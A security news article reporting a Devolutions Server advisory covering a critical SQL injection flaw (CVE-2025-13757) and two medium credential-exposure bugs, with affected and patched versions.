A critical security vulnerability has been discovered in Devolutions Server, a popular centralized password and privileged access management solution.
The flaw, rated critical severity by experts, could allow attackers to steal sensitive data or modify internal records.
Devolutions, the company behind the software, released a security advisory (DEVO-2025-0018) on November 27, 2025, detailing three separate issues.
The most dangerous of these is an “SQL Injection” vulnerability that affects how the server handles log data.
The Critical Risk: SQL Injection
The most urgent issue is tracked as CVE-2025-13757. It received a vulnerability score of 9.4 out of 10, making it a “Critical” threat.
| CVE ID | Severity | Score (CVSS) | Description |
|---|---|---|---|
| CVE-2025-13757 | Critical | 9.4 | SQL Injection |
| CVE-2025-13758 | Medium | 5.1 | Data Exposure |
| CVE-2025-13765 | Medium | 4.9 | Improper Access |
This vulnerability occurs in the “last usage logs” section of the software. Specifically, the flaw exists in a parameter called DateSortField.
When a user interacts with this feature, the software fails to verify the information sent to the database properly.
Because of this missing check, a user who is already logged into the system (an “authenticated user”) can trick the database into revealing hidden information.
In a worst-case scenario, this allows a bad actor to “exfiltrate” (steal) confidential data or even change data stored on the server.
Since Devolutions Server stores passwords and access keys, the ability to steal this data poses a significant security risk to organizations.
Two Additional Flaws Found
Alongside the critical flaw, researchers from DCIT a.s. (credited as JaGoTu) discovered two “Medium” severity issues:
- Leaked Passwords (CVE-2025-13758): Normally, when the server lists entries, it should only send basic info like names or usernames. Passwords are supposed to be sent separately only when requested. However, a bug caused some passwords to be included in that first general request, exposing them unnecessarily.
- Email Service Access (CVE-2025-13765): This flaw involves the email settings configuration. It allowed users without administrative rights to view passwords for configured email services, which should be restricted to admins only.
System administrators are urged to patch their software immediately. The vulnerabilities affect Devolutions Server versions 2025.2.20 and earlier, as well as 2025.3.8 and earlier.
To fix these security holes, organizations must upgrade to:
- Version 2025.2.21 (or higher)
- Version 2025.3.9 (or higher)
By installing these updates, the software will correctly filter database requests and hide sensitive credentials, closing the door on potential attackers.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.